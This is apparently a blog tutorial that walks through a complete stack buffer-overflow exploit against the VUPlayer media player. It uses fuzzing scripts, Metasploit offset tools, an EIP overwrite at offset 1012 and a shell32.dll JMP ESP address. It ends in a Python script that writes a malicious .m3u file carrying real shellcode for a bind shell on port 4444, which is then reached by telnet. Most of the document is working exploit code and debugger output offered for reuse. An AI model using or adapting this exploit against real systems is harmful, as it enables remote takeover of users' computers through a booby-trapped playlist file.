
Tuesday, 14 February 2012

VUPlayer Exploit


VUPlayer Buffer Overflow
A. Fuzzing
  1. I first wrote a fuzzer that produces a .vpl playlist file:
#!/usr/bin/python
# Write 1000 'A' (0x41) bytes into a .vpl playlist; binary mode so the bytes go out unchanged.
filename="error.vpl"
buffer=b"\x41" * 1000
file=open(filename,'wb')
file.write(buffer)
file.close()

  1. Run the Python script in a terminal to create the file.
  2. Start VUPlayer and load the .vpl file: the application does not crash. Raising the buffer to 2000 bytes still does not crash it.
  3. Next I wrote a fuzzer for the .m3u format:

#!/usr/bin/python
# Same 1000-byte 'A' buffer, this time as an .m3u playlist.
filename="error.m3u"
buffer=b"\x41" * 1000
file=open(filename,'wb')
file.write(buffer)
file.close()

  1. Run the fuzzer in a terminal to create the .m3u file.
  2. Start VUPlayer and load the .m3u file: with 1000 bytes it does not crash. With the buffer raised to 2000 bytes it does: the application window disappears.
  3. Then I wrote a fuzzer for the .pls format:

#!/usr/bin/python
# Same 1000-byte 'A' buffer as a .pls playlist.
filename="error.pls"
buffer=b"\x41" * 1000
file=open(filename,'wb')
file.write(buffer)
file.close()


  1. Run the fuzzer in a terminal to create the .pls file.
  2. Start VUPlayer again and load the .pls file: with 1000 bytes it does not crash. With the buffer raised to 2000 bytes it does: the application window disappears.
  3. Then I wrote a fuzzer for the .asx format:

#!/usr/bin/python
# Same 1000-byte 'A' buffer as an .asx playlist.
filename="error.asx"
buffer=b"\x41" * 1000
file=open(filename,'wb')
file.write(buffer)
file.close()

  1. Run the fuzzer in a terminal to create the .asx file.
  2. Start VUPlayer again and load the .asx file: the application does not crash. Raising the buffer to 2000 bytes still does not crash it.
  3. Then I wrote a fuzzer for the .wax format:

#!/usr/bin/python
# Same 1000-byte 'A' buffer as a .wax playlist.
filename="error.wax"
buffer=b"\x41" * 1000
file=open(filename,'wb')
file.write(buffer)
file.close()

  1. Run the fuzzer in a terminal to create the .wax file.
  2. Start VUPlayer again and load the .wax file: with 1000 bytes it does not crash. With the buffer raised to 2000 bytes it does: the application window disappears.
  3. Finally, a fuzzer for the .cue format:

#!/usr/bin/python
# Same 1000-byte 'A' buffer as a .cue sheet.
filename="error.cue"
buffer=b"\x41" * 1000
file=open(filename,'wb')
file.write(buffer)
file.close()

  1. Run the fuzzer in a terminal to create the .cue file.
  2. Start VUPlayer again and load the .cue file: the application does not crash. Raising the buffer to 2000 bytes still does not crash it.

Result: of the formats tried, the overflow is reachable through .m3u, .pls and .wax playlists (each crashes at 2000 bytes). I chose .m3u for the rest of the work.
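As an added example (not code from the original post), the whole of section A can be driven from one script instead of editing one file per extension: it writes the same 'A'-filled file for every playlist extension VUPlayer accepts and for a ramp of sizes, with the size in the file name so that the smallest file that kills the player tells you roughly how long the overflow has to be. The output directory and the size ramp are my choices.

```python
#!/usr/bin/env python3
"""Generate fixed-byte fuzz files for every playlist extension and a ramp
of sizes. Added example; not the original post's code."""
import os
import tempfile

# Playlist formats VUPlayer accepts (the extensions tried in section A).
EXTENSIONS = ("vpl", "m3u", "pls", "asx", "wax", "cue")


def fuzz_payload(size, byte=b"\x41"):
    """Return `size` copies of one byte (the 'A' * N buffer used above)."""
    return byte * size


def write_fuzz_files(outdir=None, sizes=(1000, 1500, 2000, 2500, 3000),
                     extensions=EXTENSIONS):
    """Write error_<size>.<ext> for each extension and size.

    The size is part of the file name, so when the player dies the name of
    the smallest crashing file gives the approximate overflow length.
    Returns {path: size} for the files written.
    """
    outdir = outdir or tempfile.mkdtemp(prefix="vuplayer-fuzz-")  # assumption: temp dir
    written = {}
    for ext in extensions:
        for size in sizes:
            path = os.path.join(outdir, "error_%d.%s" % (size, ext))
            # Binary mode: the bytes are written exactly, no newline translation.
            with open(path, "wb") as fh:
                fh.write(fuzz_payload(size))
            written[path] = size
    return written


def verify_files(written):
    """True if every file on disk has exactly the size recorded for it."""
    return all(os.path.getsize(p) == n for p, n in written.items())


if __name__ == "__main__":
    for path, size in sorted(write_fuzz_files().items()):
        print("%6d bytes  %s" % (size, path))
```

Load the files in order of size for one extension at a time; once the player dies, the previous (non-crashing) size bounds the length needed for the pattern step in section B.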

B. Debugging
  1. Run VUPlayer under OllyDbg to watch the process and analyse memory.
  1. Build a unique dummy data structure with pattern_create:
    - open a terminal and type:
    root@bt:~# cd /pentest/exploits/framework/tools/
    root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 2000 > error.txt

       - type in the terminal: #kwrite error.txt
        This shows the generated dummy string. Every 4-byte window in it is unique, so whatever value lands in a register at the crash identifies one offset in the file.

       - copy the contents of error.txt into the fuzzer:

#!/usr/bin/python
# Replace the 'A' buffer with the 2000-byte cyclic pattern (the two string literals are joined by Python).
filename="error1.m3u"
buffer=(b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3"
        b"Co4Co5Co")
#buffer+=b"\x41" * 2000
file=open(filename,'wb')
file.write(buffer)
file.close()

    • run the modified fuzzer in a terminal
    • run VUPlayer under OllyDbg, load the modified file, and note the value in EIP and the bytes at ESP at the crash.

  1. Find the offsets from the pattern
    - type in the terminal:
    root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 68423768
    1012
        EIP read 0x68423768 at the crash; that is the pattern text "h7Bh" read little-endian, so EIP is overwritten by the four bytes at offsets 1012, 1013, 1014 and 1015 of the file (EIP holds only 4 bytes). ESP pointed at the pattern text "8Bh9Bi":
    root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 8Bh9Bi
    1016
        So the data ESP points to starts at offset 1016, immediately after the return address.
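The two Ruby tools are simple enough to reimplement, and doing so shows why the lookup works. This added example (not the post's code, and not Metasploit's) builds the same cyclic pattern and recovers the offsets from the crash values above: the EIP value is packed little-endian before searching, which is why 0x68423768 maps to the bytes "h7Bh" at offset 1012, while the text seen at ESP is searched as-is. It also serves the earlier pattern_create step, since the same function produces the 2000-byte string pasted into error1.m3u.

```python
#!/usr/bin/env python3
"""Pure-Python equivalent of pattern_create.rb / pattern_offset.rb.
Added example; not the original post's code and not Metasploit's."""
import itertools
import string
import struct

# Same three character sets, in the same order, as the Metasploit tools.
SETS = (string.ascii_uppercase, string.ascii_lowercase, string.digits)


def pattern_create(length):
    """Cyclic pattern Aa0Aa1...Az9Ba0..., truncated to `length` bytes.

    Each 3-byte group is unique for the first 26*26*10 groups (20280
    bytes), so any 4-byte window inside that range occurs exactly once and
    the value a register holds at the crash identifies one file offset.
    """
    out = bytearray()
    for triple in itertools.cycle(itertools.product(*SETS)):
        if len(out) >= length:
            break
        out += "".join(triple).encode()
    return bytes(out[:length])


def pattern_offset(pattern, needle):
    """Offset of `needle` in `pattern`, or None if it is not present.

    `needle` may be a register value as an int (packed little-endian, the
    way x86 reads it from memory) or the raw bytes/str seen in the dump.
    """
    if isinstance(needle, int):
        needle = struct.pack("<I", needle)
    elif isinstance(needle, str):
        needle = needle.encode()
    idx = pattern.find(needle)
    return None if idx < 0 else idx


def locate(crash_eip, esp_bytes, length=2000):
    """Return (eip_offset, esp_offset) for a crash on a pattern of `length` bytes."""
    pat = pattern_create(length)
    return pattern_offset(pat, crash_eip), pattern_offset(pat, esp_bytes)


if __name__ == "__main__":
    # Values from the OllyDbg crash above: EIP = 0x68423768, ESP -> "8Bh9Bi".
    eip_off, esp_off = locate(0x68423768, "8Bh9Bi")
    print("EIP overwritten by bytes at offset %d" % eip_off)   # 1012
    print("ESP points at offset %d" % esp_off)                 # 1016
    # Write the same file as error1.m3u without pasting the pattern by hand.
    with open("error1.m3u", "wb") as fh:
        fh.write(pattern_create(2000))
```

If pattern_offset returns None for the EIP value, the crash did not consume the pattern directly (the bytes may have been transformed, or the overflow is longer than the pattern); in that case pass the big-endian reading too, or grow the pattern length.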

  1. Prove the EIP offset
    - modify the fuzzer:
    #!/usr/bin/python
    # 1012 NOPs, then 0xDEADBEEF written little-endian where the return address sits.
    filename="error2.m3u"
    buffer=b"\x90" * 1012
    buffer+=b"\xEF\xBE\xAD\xDE"
    file=open(filename,'wb')
    file.write(buffer)
    file.close()

    • run VUPlayer under OllyDbg and load the file: EIP should now read DEADBEEF.
  1. Prove the ESP offset
    - modify the fuzzer:
    #!/usr/bin/python
    # Same EIP overwrite, pad to offset 1016, then 0xCC (INT3) bytes: ESP should point at the CC bytes.
    filename="error3.m3u"
    buffer=b"\x90" * 1012
    buffer+=b"\xEF\xBE\xAD\xDE"
    buffer+=b"\x90" * (1016-len(buffer))
    buffer+=b"\xCC" * (2000-len(buffer))
    file=open(filename,'wb')
    file.write(buffer)
    file.close()

    • run VUPlayer under OllyDbg again and load the file
  1. JMP ESP
    1. Find a JMP ESP
    - Run VUPlayer under OllyDbg, open the View menu and choose Executable modules. In the Executable modules window double-click shell32.dll. In the shell32.dll window right-click → Search for → Command, type JMP ESP and press Find. The address found (7C9D30D7 below) belongs to this particular build of shell32.dll; on another Windows version it will differ and must be looked up again.

  1. Prove the JMP ESP
    - modify the fuzzer:

#!/usr/bin/python
# Return address = JMP ESP in shell32.dll (0x7C9D30D7, written little-endian), then INT3s: the debugger should break on the first 0xCC.
filename="error4.m3u"
buffer=b"\x90" * 1012
buffer+=b"\xD7\x30\x9D\x7C"
buffer+=b"\xCC" * (1016-len(buffer))
buffer+=b"\xCC" * (2000-len(buffer))
file=open(filename,'wb')
file.write(buffer)
file.close()

    • run the application under OllyDbg and load the modified file

  1. Payload
    1. Generate the payload
    - start the Metasploit 2 web GUI from a terminal:
    root@bt:~# cd /pentest/exploits/framework2/
    root@bt:/pentest/exploits/framework2# ./msfweb
    +----=[ Metasploit Framework Web Interface (127.0.0.1:55555)

    • open a web browser and go to localhost:55555
    • filter the modules by payload
    • choose a payload module (the last step below connects to the target on port 4444, so a bind shell listening on that port)
    • generate the payload

  1. Modify the fuzzer
    - paste the payload generated by msfweb:
    #!/usr/bin/python
    # 1012 NOPs, JMP ESP address, a 32-byte NOP sled, then the generated shellcode.
    filename="error5.m3u"
    buffer=b"\x90" * 1012
    buffer+=b"\xD7\x30\x9D\x7C"
    buffer+=b"\x90" * 32
    buffer+=(b"\xda\xd8\xbf\x29\xf7\x72\x58\x31\xc9\xd9\x74\x24\xf4\x58\xb1\x51"
    b"\x83\xc0\x04\x31\x78\x13\x03\x51\xe4\x90\xad\x5d\x60\xbe\x03\x75"
    b"\x8c\xbf\x63\x7a\x0f\xcb\xf0\xa0\xf4\x40\x4d\x94\x7f\x2a\x4b\x9c"
    b"\x7e\x3c\xd8\x13\x99\x49\x80\x8b\x98\xa6\x76\x40\xae\xb3\x88\xb8"
    b"\xfe\x03\x13\xe8\x85\x44\x50\xf7\x44\x8e\x94\xf6\x84\xe4\x53\xc3"
    b"\x5c\xdf\xb3\x46\xb8\x94\x9b\x8c\x43\x40\x45\x47\x4f\xdd\x01\x08"
    b"\x4c\xe0\xfe\xb5\x40\x69\x89\xd5\xbc\x71\xeb\xe6\x8c\x52\x8f\x63"
    b"\xad\x54\xdb\x33\x3e\x1e\xab\xaf\x93\xab\x0c\xc7\xb5\xc3\x02\x99"
    b"\x47\xf8\x4b\xda\x8e\x66\x3f\x42\x47\x54\x8d\xe2\xe0\xe9\xc3\xad"
    b"\x5a\xf1\xf4\x39\xa8\xe0\x09\x82\x7e\x04\x27\xab\xf7\x1f\xae\xd2"
    b"\xe5\xe8\x2d\x81\x9f\xea\xce\xf9\x08\x32\x39\x0c\x65\x93\xc5\x38"
    b"\x25\x4f\x69\x97\x99\x2c\xde\x54\x4d\x4c\x30\x3c\x19\xa3\xed\xa6"
    b"\x8a\x4a\xec\xb3\x45\xe9\xf5\xcb\x52\xa6\xf6\xfd\x37\x59\x58\x54"
    b"\x37\x89\x32\xf2\x6a\x04\x2a\xad\x8b\x8f\xff\x04\x8b\xe0\x68\x43"
    b"\x3a\x87\x20\xdc\x42\x51\xe2\xb6\xe8\x0b\xfc\xe6\x82\xdc\xe5\x7f"
    b"\x63\x65\xbd\x80\xbd\xc3\xbe\xae\x24\x86\x24\x28\xc1\x35\xc8\x3d"
    b"\xf4\xd0\x42\x64\xde\xe8\xea\x71\x4a\xb5\x65\x9f\xba\xf5\x85\xf5"
    b"\x43\xb7\x44\xf7\xfe\x14\x04\x8a\x85\x5c\x81\x3f\xd2\xf5\xa7\xc1"
    b"\x96\x10\xb7\x48\x9d\xe3\x91\xe9\x4a\x4e\x4f\x5c\x24\x04\x6e\x0f"
    b"\x97\x8d\x21\x50\xc7\x46\x6f\x77\xed\x58\x3c\x78\x38\x0e\x3c\x79"
    b"\xf2\x30\x12\x0e\xaa\x32\x10\xd4\x31\x34\xc1\x86\x46\x1a\x86\x58"
    b"\x61\x79\x24\xf7\x6e\xa8\x34\x27")
    file=open(filename,'wb')
    file.write(buffer)
    file.close()

  • run VUPlayer (without OllyDbg) and load the file
  • open a terminal on BackTrack and connect to the listener, type:
    root@bt:~# telnet 192.168.56.101 4444
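Putting the numbers together in one builder, as an added example that is not the post's script: the return address is packed with struct so there is no hand-reversal of bytes, the layout is checked against the offsets found in the debugger before the file is written, and the shellcode is screened for bytes a line-oriented playlist parser would likely stop at or mangle (the bad-character list is my assumption; confirm it in the debugger for the real target). The offsets 1012/1016 and the shell32.dll address 0x7C9D30D7 are the page's own and hold only for the Windows build they were found on; the shellcode here is a constructed INT3 placeholder, not the msfweb payload.

```python
#!/usr/bin/env python3
"""Assemble and sanity-check the final .m3u. Added example; not the
original post's code."""
import struct

EIP_OFFSET = 1012            # bytes before the saved return address (from pattern_offset)
ESP_OFFSET = 1016            # ESP points here after the ret (from pattern_offset)
JMP_ESP = 0x7C9D30D7         # shell32.dll JMP ESP found in OllyDbg; build-specific
NOP = b"\x90"
# Assumption: bytes a line-oriented playlist parser is likely to truncate
# on or rewrite. Verify against the target before trusting this list.
BAD_CHARS = b"\x00\x0a\x0d"

# Constructed placeholder payload: 8 INT3 breakpoints, not real shellcode.
PLACEHOLDER_SHELLCODE = b"\xcc" * 8


def find_bad_chars(shellcode, bad=BAD_CHARS):
    """Return the set of forbidden byte values present in `shellcode`."""
    return {b for b in bad if b in shellcode}


def build_exploit(shellcode, sled=32, total=None):
    """NOPs up to EIP, the JMP ESP address, a NOP sled, then the shellcode.

    `total`, if given, pads the buffer with NOPs to that length so it can
    match the 2000-byte files used during debugging.
    """
    bad = find_bad_chars(shellcode)
    if bad:
        raise ValueError("shellcode contains bad bytes: %r" % sorted(bad))
    buf = NOP * EIP_OFFSET
    buf += struct.pack("<I", JMP_ESP)      # little-endian; equals b"\xD7\x30\x9D\x7C"
    assert len(buf) == ESP_OFFSET          # the sled must start exactly where ESP lands
    buf += NOP * sled
    buf += shellcode
    if total is not None:
        buf += NOP * max(0, total - len(buf))
    return buf


def check_layout(buf, shellcode, sled=32):
    """Independent check that the return address, the sled and the payload
    sit at the offsets the debugger showed they must."""
    ret = struct.unpack("<I", buf[EIP_OFFSET:EIP_OFFSET + 4])[0]
    start = ESP_OFFSET + sled
    return (ret == JMP_ESP
            and buf[ESP_OFFSET:start] == NOP * sled
            and buf[start:start + len(shellcode)] == shellcode)


if __name__ == "__main__":
    exploit = build_exploit(PLACEHOLDER_SHELLCODE)
    print("layout ok:", check_layout(exploit, PLACEHOLDER_SHELLCODE))
    with open("error5.m3u", "wb") as fh:
        fh.write(exploit)
```

With the placeholder payload the player should stop on an INT3 under OllyDbg right after the JMP ESP and the sled; swap in the generated shellcode only once that is seen, so a failure afterwards can be blamed on the payload rather than on the layout.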

======GOOD LUCK========
